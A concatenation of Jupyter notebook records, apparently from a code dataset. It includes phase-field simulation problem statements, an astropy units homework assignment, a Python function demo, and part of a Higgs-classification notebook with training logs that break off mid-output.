$$\n\nwhere\n\n<table width=\"200\">\n<tr>\n<td> $\\bar{c}_0$ </td>\n<td> 0.45 </td>\n</tr>\n<tr>\n<td> $\\vec{q}$ </td>\n<td> $\\left(\\sqrt{2},\\sqrt{3}\\right)$ </td>\n</tr>\n<tr>\n<td> $\\epsilon$ </td>\n<td> 0.01 </td>\n</tr>\n</table>", "_____no_output_____" ], [ "### Domains", "_____no_output_____" ], [ "#### a. Square Periodic", "_____no_output_____" ], [ "2D square domain with $L_x = L_y = 200$ and periodic boundary conditions.", "_____no_output_____" ] ], [ [ "from IPython.display import SVG\nSVG(filename='../images/block1.svg')", "_____no_output_____" ] ], [ [ "#### b. No Flux", "_____no_output_____" ], [ "2D square domain with $L_x = L_y = 200$ and zero flux boundary conditions.", "_____no_output_____" ], [ "#### c. T-Shape No Flux", "_____no_output_____" ], [ "T-shaped reiong with zero flux boundary conditions with $a=b=100$ and $c=d=20.$", "_____no_output_____" ] ], [ [ "from IPython.display import SVG\nSVG(filename='../images/t-shape.svg')", "_____no_output_____" ] ], [ [ "#### d. Sphere", "_____no_output_____" ], [ "Domain is the surface of a sphere with radius 100, but with initial conditions of\n\n$$ c\\left(\\theta, \\phi, 0\\right) = \\bar{c}_0 + \\epsilon \\cos \\left( \\sqrt{233} \\theta \\right)\n \\sin \\left( \\sqrt{239} \\phi \\right) $$\n\nwhere $\\theta$ and $\\phi$ are the polar and azimuthal angles in a spherical coordinate system. $\\bar{c}_0$ and $\\epsilon$ are given by the values in the table above.", "_____no_output_____" ], [ "### Tasks", "_____no_output_____" ], [ "Your task for each domain,\n\n 1. Calculate the time evolution of the concentration -- store concentration at time steps to make a movie\n\n 2. Plot the free energy as a function of time steps until you judge that convergence or a local equilibrium has been reached.\n\n 3. Present wall clock time for the calculations, and wall clock time per core used in the calculation.\n\n 4. For domain a. above, demonstrate that the solution is robust with respect to meshing by refining the mesh (e.g. reduce the mesh size by about a factor of $\\sqrt{2}$ in linear dimensions -- use whatever convenient way you have to refine the mesh without exploding the computational time).", "_____no_output_____" ], [ "## 2. Ostwald Ripening -- coupled Cahn-Hilliard and Allen-Cahn equations", "_____no_output_____" ], [ "Expanded problem in that the phase field, described by variables $\\eta_i$, is now coupled to the concentration field $c$. The Ginzberg-Landau free energy density is now taken to be,\n\n$$ f = f_0 \\left[ C \\left( \\vec{r} \\right), \\eta_1, ... , \\eta_p \\right]\n+ \\frac{\\kappa_C}{2} \\left[ \\nabla C \\left( \\vec{r} \\right) \\right]^2 +\n\\sum_{i=1}^p \\frac{\\kappa_C}{2} \\left[ \\nabla \\eta_i \\left( \\vec{r} \\right) \\right]^2\n$$\n\nHere, $f_0$ is a bulk free energy density,\n\n$$ f_0 \\left[ C \\left( \\vec{r} \\right), \\eta_1, ... , \\eta_p \\right] \n= f_1 \\left( C \\right) + \\sum_{i=1}^p f_2 \\left( C, \\eta_i \\right)\n+ \\sum_{i=1}^p \\sum_{j\\ne i}^p f_3 \\left( \\eta_j, \\eta_i \\right) $$\n\nHere, $ f_1 \\left( C \\right) $ is the free energy density due to the concentration field, $C$, with local minima at $C_{\\alpha}$ and $C_{\\beta}$ corresponding to the solubilities in the matrix phase and the second phase, respectively; $f_2\\left(C , \\eta_i \\right)$ is an interaction term between the concentration field and the phase fields, and $f_3 \\left( \\eta_i, \\eta_j \\right)$ is the free energy density of the phase fields. Simple models for these free energy densities are,\n\n$$ f_1\\left( C \\right) =\n - \\frac{A}{2} \\left(C - C_m\\right)^2\n + \\frac{B}{4} \\left(C - C_m\\right)^4\n + \\frac{D_{\\alpha}}{4} \\left(C - C_{\\alpha} \\right)^4\n + \\frac{D_{\\beta}}{4} \\left(C - C_{\\beta} \\right)^4 $$\n\nwhere \n\n$$ C_m = \\frac{1}{2} \\left(C_{\\alpha} + C_{\\beta} \\right) $$\n\nand\n\n$$ f_2 \\left( C, \\eta_i \\right) = - \\frac{\\gamma}{2} \\left( C - C_{\\alpha} \\right)^2 \\eta_i^2 + \\frac{\\beta}{2} \\eta_i^4 $$\n\nwhere\n\n$$ f_3 \\left( \\eta_i, \\eta_j \\right) = \\frac{ \\epsilon_{ij} }{2} \\eta_i^2 \\eta_j^2, i \\ne j $$\n\nThe time evolution of the system is now given by coupled Cahn-Hilliard and Allen-Cahn (time dependent Gizberg-Landau) equations for the conserved concentration field and the non-conserved phase fields:\n\n$$\n\\begin{eqnarray}\n\\frac{\\partial C}{\\partial t} &=& \\nabla \\cdot \\left \\{\n D \\nabla \\left[ \\frac{\\delta F}{\\delta C} \\right] \\right \\} \\\\\n &=& D \\left[ -A + 3 B \\left( C- C_m \\right)^2 + 3 D_{\\alpha} \\left( C - C_{\\alpha} \\right)^2 + 3 D_{\\beta} \\left( C - C_{\\beta} \\right)^2 \\right] \\nabla^2 C \\\\\n& & -D \\gamma \\sum_{i=1}^{p} \\left[ \\eta_i^2 \\nabla^2 C + 4 \\nabla C \\cdot \\nabla \\eta_i + 2 \\left( C - C_{\\alpha} \\right) \\nabla^2 \\eta_i \\right] - D \\kappa_C \\nabla^4 C\n\\end{eqnarray}\n$$\n\nand the phase field equations\n\n$$\n\\begin{eqnarray}\n\\frac{\\partial \\eta_i}{\\partial t} &=& - L_i \\frac{\\delta F}{\\delta \\eta_i} \\\\\n &=& \\frac{\\partial f_2}{\\delta \\eta_i} + \\frac{\\partial f_3}{\\delta \\eta_i} - \\kappa_i \\nabla^2 \\eta_i \\left(\\vec{r}, t\\right) \\\\\n &=& L_i \\gamma \\left( C - C_{\\alpha} \\right)^2 \\eta_i - L_i \\beta \\eta_i^3 - L_i \\eta_i \\sum_{j\\ne i}^{p} \\epsilon_{ij} \\eta^2_j + L_i \\kappa_i \\nabla^2 \\eta_i\n\\end{eqnarray}\n$$", "_____no_output_____" ], [ "### Parameter Values", "_____no_output_____" ], [ "Use the following parameter values.\n\n<table width=\"200\">\n<tr>\n<td> $C_{\\alpha}$ </td>\n<td> 0.05 </td>\n</tr>\n<tr>\n<td> $C_{\\beta}$ </td>\n<td> 0.95 </td>\n</tr>\n<tr>\n<td> A </td>\n<td> 2.0 </td>\n</tr>\n<tr>\n<td> $\\kappa_i$ </td>\n<td> 2.0 </td>\n</tr>\n<tr>\n<td> $\\kappa_j$ </td>\n<td> 2.0 </td>\n</tr>\n<tr>\n<td> $\\kappa_k$ </td>\n<td> 2.0 </td>\n</tr>\n<tr>\n<td> $\\epsilon_{ij}$ </td>\n<td> 3.0 </td>\n</tr>\n<tr>\n<td> $\\beta$ </td>\n<td> 1.0 </td>\n</tr>\n<tr>\n<td> $p$ </td>\n<td> 10 </td>\n</tr>\n</table>\n\nwith\n\n$$ B = \\frac{A}{\\left( C_{\\alpha} - C_m \\right)^2} $$\n\n$$ \\gamma = \\frac{2}{\\left(C_{\\beta} - C_{\\alpha}\\right)^2} $$\n\n$$ D = D_{\\alpha} = D_{\\beta} = \\frac{\\gamma}{\\delta^2} $$\n\nThe diffusion coefficient, $D$, is constant and isotropic and the same (unity) for both phases; the mobility-related constants, $L_i$, are the same (unity) for all phase fields.", "_____no_output_____" ], [ "### Initial Conditions", "_____no_output_____" ], [ "Set $c\\left(\\vec{r}, t\\right)$ such that\n\n$$ \n\\begin{eqnarray}\nc\\left(\\vec{r}, 0\\right) &=& \\bar{c}_0 + \\epsilon \\cos \\left( \\vec{q} \\cdot \\vec{r} \\right) \\\\\n\\eta_i\\left(\\vec{r}, 0\\right) &=& \\bar{\\eta}_0 + 0.01 \\epsilon_i \\cos^2 \\left( \\vec{q} \\cdot \\vec{r} \\right)\n\\end{eqnarray}\n$$\n\nwhere\n\n<table width=\"200\">\n<tr>\n<td> $\\bar{c}_0$ </td>\n<td> 0.5 </td>\n</tr>\n<tr>\n<td> $\\vec{q}$ </td>\n<td> $\\left(\\sqrt{2},\\sqrt{3}\\right)$ </td>\n</tr>\n<tr>\n<td> $\\epsilon$ </td>\n<td> 0.01 </td>\n</tr>\n<tr>\n<td> $\\vec{q}_i$ </td>\n<td> $\\left( \\sqrt{23 + i}, \\sqrt{149 + i} \\right)$ </td>\n</tr>\n<tr>\n<td> $\\epsilon_i$ </td>\n<td> 0.979285, 0.219812,\t0.837709,\t0.695603, \t0.225115,\t\n0.389266, \t0.585953,\t0.614471, \t0.918038,\t0.518569 </td>\n</tr>\n<tr>\n<td> $\\eta_0$ </td>\n<td> 0.0 </td>\n</tr>\n</table>", "_____no_output_____" ], [ "### Domains", "_____no_output_____" ], [ "#### a. Square Periodic", "_____no_output_____" ], [ "2D square domain with $L_x = L_y = 200$ and periodic boundary conditions.", "_____no_output_____" ] ], [ [ "from IPython.display import SVG\nSVG(filename='../images/block1.svg')", "_____no_output_____" ] ], [ [ "#### b. No Flux", "_____no_output_____" ], [ "2D square domain with $L_x = L_y = 200$ and zero flux boundary conditions.", "_____no_output_____" ], [ "#### c. T-Shape No Flux", "_____no_output_____" ], [ "T-shaped reiong with zero flux boundary conditions with $a=b=100$ and $c=d=20.$", "_____no_output_____" ] ], [ [ "from IPython.display import SVG\nSVG(filename='../images/t-shape.svg')", "_____no_output_____" ] ], [ [ "#### d. Sphere", "_____no_output_____" ], [ "Domain is the surface of a sphere with radius 100, but with initial conditions of\n\n$$ c\\left(\\theta, \\phi, 0\\right) = \\bar{c}_0 + \\epsilon \\cos \\left( \\sqrt{233} \\theta \\right)\n \\sin \\left( \\sqrt{239} \\phi \\right) $$\n\nand\n\n$$ \\eta_i\\left(\\theta, \\phi, 0\\right) = \\bar{\\eta}_0 + 0.01 \\epsilon_i \\cos^2 \\left( \\sqrt{23 + i} \\theta \\right)\n \\sin^2 \\left( \\sqrt{149 + i} \\phi \\right) $$\n\nwhere $\\theta$ and $\\phi$ are the polar and azimuthal angles in a spherical coordinate system and parameter values are in the table above.", "_____no_output_____" ], [ "### Tasks", "_____no_output_____" ], [ "Your task for each domain,\n\n 1. Calculate the time evolution of the concentration -- store concentration at time steps to make a movie\n\n 2. Plot the free energy as a function of time steps until you judge that convergence or a local equilibrium has been reached.\n\n 3. Present wall clock time for the calculations, and wall clock time per core used in the calculation.", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ] ]
cb1c08e90560a37de4d323ad41e054583cb670e8
8,490
ipynb
Jupyter Notebook
FirstLast_HW4.ipynb
UWashington-Astro300/Astro300-W17
ad071877ecc859c3cd2d151929235990fc0297ee
[ "MIT" ]
null
null
null
FirstLast_HW4.ipynb
UWashington-Astro300/Astro300-W17
ad071877ecc859c3cd2d151929235990fc0297ee
[ "MIT" ]
null
null
null
FirstLast_HW4.ipynb
UWashington-Astro300/Astro300-W17
ad071877ecc859c3cd2d151929235990fc0297ee
[ "MIT" ]
null
null
null
23.715084
282
0.545583
[ [ [ "# First Last - Homework 4", "_____no_output_____" ], [ "* Use the `Astropy` units and constants packages to solve the following problems.\n* Do not hardcode any constants!\n* Unless asked, your units should be in the simplest SI units possible", "_____no_output_____" ] ], [ [ "import numpy as np\n\nfrom astropy import units as u\nfrom astropy import constants as const\nfrom astropy.units import imperial\nimperial.enable()", "_____no_output_____" ] ], [ [ "### Impulse is a change in momentum\n\n$$ I = \\Delta\\ p\\ =\\ m\\Delta v $$", "_____no_output_____" ], [ "**Problem 1** - Calculate the $\\Delta$v that would be the result of an impuse of 700 (N * s) for M = 338 kg.", "_____no_output_____" ], [ "**Problem 2** - Calculate the $\\Delta$v that would be the result of an impuse of 700 (lbf * s) for M = 338 kg.", "_____no_output_____" ], [ "This is the unit conversion error that doomed the [Mars Climate Orbiter](https://en.wikipedia.org/wiki/Mars_Climate_Orbiter)", "_____no_output_____" ], [ "### The range of a projectile launched with a velocity (v) at and angle ($\\theta$) is\n\n$$R\\ =\\ {v^2 \\over g}\\ sin(2\\theta)$$", "_____no_output_____" ], [ "**Problem 3** - Find R for v = 123 mph and $\\theta$ = 1000 arc minutes", "_____no_output_____" ], [ "**Problem 4** - How fast to you have to throw a football at 33.3 degrees so that is goes exactly 100 yards? Express your answer in mph", "_____no_output_____" ], [ "### Kepler's third law can be expressed as:\n\n$$ T^2 = \\left( {{4\\pi^2} \\over {GM}} \\right)\\ r^3 $$\n\nWhere **T** is the orbial period of an object at distance (**r**) around a central object of mass (**M**).\n\nIt assumes the mass of the orbiting object is small compared to the mass of the central object.", "_____no_output_____" ], [ "**Problem 5** - Calculate the orbital period of HST. HST orbits 353 miles above the **surface** of the Earth. Expess your answer in minutes.", "_____no_output_____" ], [ "** Problem 6 ** - An exoplanet orbits the star Epsilon Tauri in 595 days at a distance of 1.93 AU. Calculate the mass of Epsilon Tauri in terms of solar masses.", "_____no_output_____" ], [ "### The velocity of an object in orbit is\n\n$$ v=\\sqrt{GM\\over r} $$\n\nWhere the object is at a distance (**r**) around a central object of mass (**M**).", "_____no_output_____" ], [ "**Problem 7** - Calculate the velocity of HST. Expess your answer in km/s and mph.", "_____no_output_____" ], [ "**Problem 8** - The Procliamer's song [500 miles](https://youtu.be/MJuyn0WAYNI?t=27s) has a duration of 3 minutes and 33 seconds. Calculate at what altitude, above the Earth's surface, you would have to orbit to go 1000 miles in this time. Express your answer in km and miles.", "_____no_output_____" ], [ "### The Power being received by a solar panel in space can be expressed as:\n\n$$ I\\ =\\ {{L_{\\odot}} \\over {4 \\pi d^2}}\\ \\varepsilon$$\n\nWhere **I** is the power **per unit area** at a distance (**d**) from the Sun, and $\\varepsilon$ is the efficiency of the solar panel.\n\nThe solar panels that power spacecraft have an efficiency of about 40%.", "_____no_output_____" ], [ "** Problem 9 ** - The [New Horizons](http://pluto.jhuapl.edu/) spacecraft requires 220 Watts of power.\n\nCalculate the area of a solar panel that would be needed to power New Horizons at a distance of 1 AU from the Sun.", "_____no_output_____" ], [ "** Problem 10 ** - Express your answer in units of the area of a piece of US letter sized paper (8.5 in x 11 in).", "_____no_output_____" ], [ "** Problem 11 ** - Same question as above but now a d = 30 AU.\n\nExpress you answer in both sq meters and US letter sized paper", "_____no_output_____" ], [ "** Problem 12 ** - The main part of the Oort cloud is thought to be at a distance of about 10,000 AU.\n\nCalculate the size of the solar panel New Horizons would need to operate in the Oort cloud.\n\nExpress your answer in units of the area of an American football field (120 yd x 53.3 yd).", "_____no_output_____" ], [ "** Problem 13 ** - Calculate the maximum distance from the Sun where a solar panel of 1 football field can power the New Horizons spacecraft. Express your answer in AU.", "_____no_output_____" ], [ "### Due Tue Jan 31 - 5pm\n- `Make sure to change the filename to your name!`\n- `Make sure to change the Title to your name!`\n- `File -> Download as -> HTML (.html)`\n- `upload your .html and .ipynb file to the class Canvas page` ", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb1c0dd292aa7ca82f4d26866cfe872785074d35
1,479
ipynb
Jupyter Notebook
ml_repo/1. Python Programming/Python Functions.ipynb
sachinpr0001/data_science
d028233ff7bbcbbb6b26f01806d1c5ccf788df9a
[ "MIT" ]
null
null
null
ml_repo/1. Python Programming/Python Functions.ipynb
sachinpr0001/data_science
d028233ff7bbcbbb6b26f01806d1c5ccf788df9a
[ "MIT" ]
null
null
null
ml_repo/1. Python Programming/Python Functions.ipynb
sachinpr0001/data_science
d028233ff7bbcbbb6b26f01806d1c5ccf788df9a
[ "MIT" ]
null
null
null
19.207792
79
0.448952
[ [ [ "def fun(a,b,*x,**y):\n print(a)\n print(b)\n print(x)\n print(type(x))\n print(y)\n print(type(y))\n \n for k in y:\n print(k,y[k])\n \n \nfun(1,2,3,4,10,14,shake=\"OreoShake\",drink=\"lemonade\",fruit=\"Mango\")", "1\n2\n(3, 4, 10, 14)\n<class 'tuple'>\n{'shake': 'OreoShake', 'drink': 'lemonade', 'fruit': 'Mango'}\n<class 'dict'>\nshake OreoShake\ndrink lemonade\nfruit Mango\n" ] ] ]
[ "code" ]
[ [ "code" ] ]
cb1c0dd70bc4bdedcfa1dda4582006b803102d39
542,855
ipynb
Jupyter Notebook
Notebooks/6_Model_SWA_Augmentation.ipynb
GilesStrong/QCHS-2018
80d932b2d1a8a2f1f0b2f3f024d6999e20dbef33
[ "MIT" ]
4
2018-08-03T23:42:08.000Z
2019-04-24T11:04:44.000Z
Notebooks/6_Model_SWA_Augmentation.ipynb
GilesStrong/QCHS-2018
80d932b2d1a8a2f1f0b2f3f024d6999e20dbef33
[ "MIT" ]
null
null
null
Notebooks/6_Model_SWA_Augmentation.ipynb
GilesStrong/QCHS-2018
80d932b2d1a8a2f1f0b2f3f024d6999e20dbef33
[ "MIT" ]
2
2019-02-12T12:15:53.000Z
2019-03-25T15:00:23.000Z
104.154835
214,808
0.818778
[ [ [ "# Swish-based classifier with data augmentation and stochastic weght-averaging\n- Swish activation, 4 layers, 100 neurons per layer\n- Data is augmentaed via phi rotations, and transvers and longitudinal flips\n- Model uses a running average of previous weights\n- Validation score use ensemble of 10 models weighted by loss", "_____no_output_____" ], [ "### Import modules", "_____no_output_____" ] ], [ [ "%matplotlib inline\nfrom __future__ import division\nimport sys\nimport os\nsys.path.append('../')\nfrom Modules.Basics import *\nfrom Modules.Class_Basics import *", "/home/giles/anaconda3/lib/python3.6/site-packages/h5py/__init__.py:36: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`.\n from ._conv import register_converters as _register_converters\n/home/giles/anaconda3/lib/python3.6/site-packages/statsmodels/compat/pandas.py:56: FutureWarning: The pandas.core.datetools module is deprecated and will be removed in a future version. Please use the pandas.tseries module instead.\n from pandas.core import datetools\nUsing TensorFlow backend.\n" ] ], [ [ "## Options", "_____no_output_____" ] ], [ [ "with open(dirLoc + 'features.pkl', 'rb') as fin:\n classTrainFeatures = pickle.load(fin)", "_____no_output_____" ], [ "nSplits = 10\npatience = 50\nmaxEpochs = 200\n\nensembleSize = 10\nensembleMode = 'loss'\n\ncompileArgs = {'loss':'binary_crossentropy', 'optimizer':'adam'}\ntrainParams = {'epochs' : 1, 'batch_size' : 256, 'verbose' : 0}\nmodelParams = {'version':'modelSwish', 'nIn':len(classTrainFeatures), 'compileArgs':compileArgs, 'mode':'classifier'}\n\nprint (\"\\nTraining on\", len(classTrainFeatures), \"features:\", [var for var in classTrainFeatures])", "\nTraining on 31 features: ['DER_mass_MMC', 'DER_mass_transverse_met_lep', 'DER_mass_vis', 'DER_pt_h', 'DER_deltaeta_jet_jet', 'DER_mass_jet_jet', 'DER_prodeta_jet_jet', 'DER_deltar_tau_lep', 'DER_pt_tot', 'DER_sum_pt', 'DER_pt_ratio_lep_tau', 'DER_met_phi_centrality', 'DER_lep_eta_centrality', 'PRI_met_pt', 'PRI_met_sumet', 'PRI_jet_num', 'PRI_jet_all_pt', 'PRI_tau_px', 'PRI_tau_py', 'PRI_tau_pz', 'PRI_lep_px', 'PRI_lep_py', 'PRI_lep_pz', 'PRI_jet_leading_px', 'PRI_jet_leading_py', 'PRI_jet_leading_pz', 'PRI_jet_subleading_px', 'PRI_jet_subleading_py', 'PRI_jet_subleading_pz', 'PRI_met_px', 'PRI_met_py']\n" ] ], [ [ "## Import data", "_____no_output_____" ] ], [ [ "with open(dirLoc + 'inputPipe.pkl', 'rb') as fin:\n inputPipe = pickle.load(fin)", "_____no_output_____" ], [ "trainData = RotationReflectionBatch(classTrainFeatures, h5py.File(dirLoc + 'train.hdf5', \"r+\"),\n inputPipe=inputPipe, augRotMult=16)", "_____no_output_____" ] ], [ [ "## Determine LR", "_____no_output_____" ] ], [ [ "lrFinder = batchLRFind(trainData, getModel, modelParams, trainParams,\n lrBounds=[1e-5,1e-1], trainOnWeights=True, verbose=0)", "2 classes found, running in binary mode\n\n" ] ], [ [ "## Train classifier", "_____no_output_____" ] ], [ [ "results, histories = batchTrainClassifier(trainData, nSplits, getModel, \n {**modelParams, 'compileArgs':{**compileArgs, 'lr':2e-3}},\n trainParams, trainOnWeights=True, maxEpochs=maxEpochs,\n swaStart=125, swaRenewal=-1,\n patience=patience, verbose=1, amsSize=250000)", "Training using weights\nRunning fold 1 / 10\n2 classes found, running in binary mode\n\n1 New best found: 3.8324186580732575e-05\n2 New best found: 3.7469157104559623e-05\n3 New best found: 3.6876136355998674e-05\n4 New best found: 3.543037565955778e-05\n6 New best found: 3.5032572314542355e-05\n7 New best found: 3.4872763021548655e-05\n8 New best found: 3.485711923319024e-05\n9 New best found: 3.439738119348264e-05\n11 New best found: 3.428611103207681e-05\n12 New best found: 3.402505283530772e-05\n14 New best found: 3.4012628727319535e-05\n16 New best found: 3.376790851863805e-05\n19 New best found: 3.370774209442384e-05\n20 New best found: 3.35804229767278e-05\n27 New best found: 3.336912276656435e-05\n28 New best found: 3.3106097036002034e-05\n41 New best found: 3.300400146347483e-05\n47 New best found: 3.298249243327946e-05\n48 New best found: 3.279903765427508e-05\n50 New best found: 3.2782877783929946e-05\n65 New best found: 3.268424417499816e-05\n67 New best found: 3.264187868025979e-05\n74 New best found: 3.2627491190936e-05\n94 New best found: 3.253126695226105e-05\n98 New best found: 3.250455119086954e-05\n104 New best found: 3.244058855133024e-05\n106 New best found: 3.243724077301324e-05\nSWA beginning\nmodel is 0 epochs old\n125 swa loss 3.284072900850413e-05, default loss 3.284072900850413e-05\nmodel is 1 epochs old\nnew model is 1 epochs old\n126 swa loss 3.233631254252461e-05, default loss 3.257266895116075e-05\n126 New best found: 3.233631254252461e-05\nmodel is 2 epochs old\nnew model is 2 epochs old\n127 swa loss 3.214402207119742e-05, default loss 3.250504008558116e-05\n127 New best found: 3.214402207119742e-05\nmodel is 3 epochs old\nnew model is 3 epochs old\n128 swa loss 3.2091513115524464e-05, default loss 3.256766885649915e-05\n128 New best found: 3.2091513115524464e-05\nmodel is 4 epochs old\nnew model is 4 epochs old\n129 swa loss 3.208314313660644e-05, default loss 3.270737938301272e-05\n129 New best found: 3.208314313660644e-05\nmodel is 5 epochs old\nnew model is 5 epochs old\n130 swa loss 3.2064450477941e-05, default loss 3.264426856985444e-05\n130 New best found: 3.2064450477941e-05\nmodel is 6 epochs old\nnew model is 6 epochs old\n131 swa loss 3.203814258981529e-05, default loss 3.2696535788666445e-05\n131 New best found: 3.203814258981529e-05\nmodel is 7 epochs old\nnew model is 7 epochs old\n132 swa loss 3.20390896257448e-05, default loss 3.278792753612272e-05\nmodel is 8 epochs old\nnew model is 8 epochs old\n133 swa loss 3.203521778755422e-05, default loss 3.258784056869484e-05\n133 New best found: 3.203521778755422e-05\nmodel is 9 epochs old\nnew model is 9 epochs old\n134 swa loss 3.203227607120931e-05, default loss 3.258650972911344e-05\n134 New best found: 3.203227607120931e-05\nmodel is 10 epochs old\nnew model is 10 epochs old\n135 swa loss 3.2054988226743826e-05, default loss 3.29165085785239e-05\nmodel is 11 epochs old\nnew model is 11 epochs old\n136 swa loss 3.2065276659134796e-05, default loss 3.290205558854912e-05\nmodel is 12 epochs old\nnew model is 12 epochs old\n137 swa loss 3.2055375399553827e-05, default loss 3.250493022840945e-05\nmodel is 13 epochs old\nnew model is 13 epochs old\n138 swa loss 3.2046686135556315e-05, default loss 3.246360355010168e-05\nmodel is 14 epochs old\nnew model is 14 epochs old\n139 swa loss 3.203830921498427e-05, default loss 3.246197410500905e-05\nmodel is 15 epochs old\nnew model is 15 epochs old\n140 swa loss 3.203849638197394e-05, default loss 3.250507379707308e-05\nmodel is 16 epochs old\nnew model is 16 epochs old\n141 swa loss 3.204608376124114e-05, default loss 3.260884068369432e-05\nmodel is 17 epochs old\nnew model is 17 epochs old\n142 swa loss 3.2051994474676296e-05, default loss 3.305559441042328e-05\nmodel is 18 epochs old\nnew model is 18 epochs old\n143 swa loss 3.204933308352901e-05, default loss 3.249281423333595e-05\nmodel is 19 epochs old\nnew model is 19 epochs old\n144 swa loss 3.2052260764020685e-05, default loss 3.2737132968265605e-05\nmodel is 20 epochs old\nnew model is 20 epochs old\n145 swa loss 3.205150359848564e-05, default loss 3.2709347686609234e-05\nmodel is 21 epochs old\nnew model is 21 epochs old\n146 swa loss 3.2043437250972684e-05, default loss 3.233272486032045e-05\nmodel is 22 epochs old\nnew model is 22 epochs old\n147 swa loss 3.203905765424241e-05, default loss 3.251201085546101e-05\nmodel is 23 epochs old\nnew model is 23 epochs old\n148 swa loss 3.2032601898901896e-05, default loss 3.253291424439921e-05\nmodel is 24 epochs old\nnew model is 24 epochs old\n149 swa loss 3.202165946859929e-05, default loss 3.2453614879739155e-05\n149 New best found: 3.202165946859929e-05\nmodel is 25 epochs old\nnew model is 25 epochs old\n150 swa loss 3.201618709693408e-05, default loss 3.232309290770231e-05\n150 New best found: 3.201618709693408e-05\nmodel is 26 epochs old\nnew model is 26 epochs old\n151 swa loss 3.201142377440587e-05, default loss 3.253383029752658e-05\n151 New best found: 3.201142377440587e-05\nmodel is 27 epochs old\nnew model is 27 epochs old\n152 swa loss 3.200545020459221e-05, default loss 3.2428580517522144e-05\n152 New best found: 3.200545020459221e-05\nmodel is 28 epochs old\nnew model is 28 epochs old\n153 swa loss 3.2007076303660195e-05, default loss 3.258682629551746e-05\nmodel is 29 epochs old\nnew model is 29 epochs old\n154 swa loss 3.200513206440468e-05, default loss 3.284024418488672e-05\n154 New best found: 3.200513206440468e-05\nmodel is 30 epochs old\nnew model is 30 epochs old\n155 swa loss 3.200596160232034e-05, default loss 3.255328578185347e-05\nmodel is 31 epochs old\nnew model is 31 epochs old\n156 swa loss 3.199855685006587e-05, default loss 3.2459988162496235e-05\n156 New best found: 3.199855685006587e-05\nmodel is 32 epochs old\nnew model is 32 epochs old\n157 swa loss 3.1996085069417334e-05, default loss 3.2422143356145824e-05\n157 New best found: 3.1996085069417334e-05\nmodel is 33 epochs old\nnew model is 33 epochs old\n158 swa loss 3.1994705304673144e-05, default loss 3.256531336542617e-05\n158 New best found: 3.1994705304673144e-05\nmodel is 34 epochs old\nnew model is 34 epochs old\n159 swa loss 3.199708605026487e-05, default loss 3.294959547614317e-05\nmodel is 35 epochs old\nnew model is 35 epochs old\n160 swa loss 3.19986151101203e-05, default loss 3.2690953704188255e-05\nmodel is 36 epochs old\nnew model is 36 epochs old\n161 swa loss 3.1998294590430264e-05, default loss 3.276537811870186e-05\nmodel is 37 epochs old\nnew model is 37 epochs old\n162 swa loss 3.1999839457601796e-05, default loss 3.280843444999087e-05\nmodel is 38 epochs old\nnew model is 38 epochs old\n163 swa loss 3.199927832258734e-05, default loss 3.255664740145912e-05\nmodel is 39 epochs old\nnew model is 39 epochs old\n164 swa loss 3.200233988890934e-05, default loss 3.26348186491424e-05\nmodel is 40 epochs old\nnew model is 40 epochs old\n165 swa loss 3.200585248462234e-05, default loss 3.300856329402918e-05\nmodel is 41 epochs old\nnew model is 41 epochs old\n166 swa loss 3.200239436888103e-05, default loss 3.2953081365906554e-05\nmodel is 42 epochs old\nnew model is 42 epochs old\n167 swa loss 3.199528419008675e-05, default loss 3.2820024400737e-05\nmodel is 43 epochs old\nnew model is 43 epochs old\n168 swa loss 3.199508155561728e-05, default loss 3.254037656632815e-05\nmodel is 44 epochs old\nnew model is 44 epochs old\n169 swa loss 3.199640764666626e-05, default loss 3.279248891872598e-05\nmodel is 45 epochs old\nnew model is 45 epochs old\n170 swa loss 3.199810921606272e-05, default loss 3.270488206748675e-05\nmodel is 46 epochs old\nnew model is 46 epochs old\n171 swa loss 3.199646691640401e-05, default loss 3.231664303333567e-05\nmodel is 47 epochs old\nnew model is 47 epochs old\n172 swa loss 3.199763960704779e-05, default loss 3.253691747446211e-05\nmodel is 48 epochs old\nnew model is 48 epochs old\n173 swa loss 3.1999424333330324e-05, default loss 3.2547429209697255e-05\nmodel is 49 epochs old\nnew model is 49 epochs old\n174 swa loss 3.1994691086346026e-05, default loss 3.246355856011902e-05\n174 New best found: 3.1994691086346026e-05\nmodel is 50 epochs old\nnew model is 50 epochs old\n175 swa loss 3.199043564879936e-05, default loss 3.282002160777827e-05\n175 New best found: 3.199043564879936e-05\nmodel is 51 epochs old\nnew model is 51 epochs old\n176 swa loss 3.1988215248678005e-05, default loss 3.269261726541341e-05\n176 New best found: 3.1988215248678005e-05\n" ] ], [ [ "Once SWA is activated at epoch 125, we find that the validation loss goes through a rapid decrease followed by a plateau with large suppression of the statistical fluctuations.\n\nComparing to 5_Model_Data_Augmentation the metrics are mostly the same, except for the AMS which moves from3.98 to 4.04.", "_____no_output_____" ], [ "## Construct ensemble", "_____no_output_____" ] ], [ [ "with open('train_weights/resultsFile.pkl', 'rb') as fin: \n results = pickle.load(fin)", "_____no_output_____" ], [ "ensemble, weights = assembleEnsemble(results, ensembleSize, ensembleMode, compileArgs)", "Choosing ensemble by loss\nModel 0 is 6 with loss = 3.056904335753643e-05\nModel 1 is 9 with loss = 3.071672455570552e-05\nModel 2 is 3 with loss = 3.120919069624506e-05\nModel 3 is 4 with loss = 3.186284687035368e-05\nModel 4 is 1 with loss = 3.198194178443449e-05\nModel 5 is 0 with loss = 3.1988215248678005e-05\nModel 6 is 2 with loss = 3.202857282279059e-05\nModel 7 is 7 with loss = 3.212407101093995e-05\nModel 8 is 5 with loss = 3.249272352986736e-05\nModel 9 is 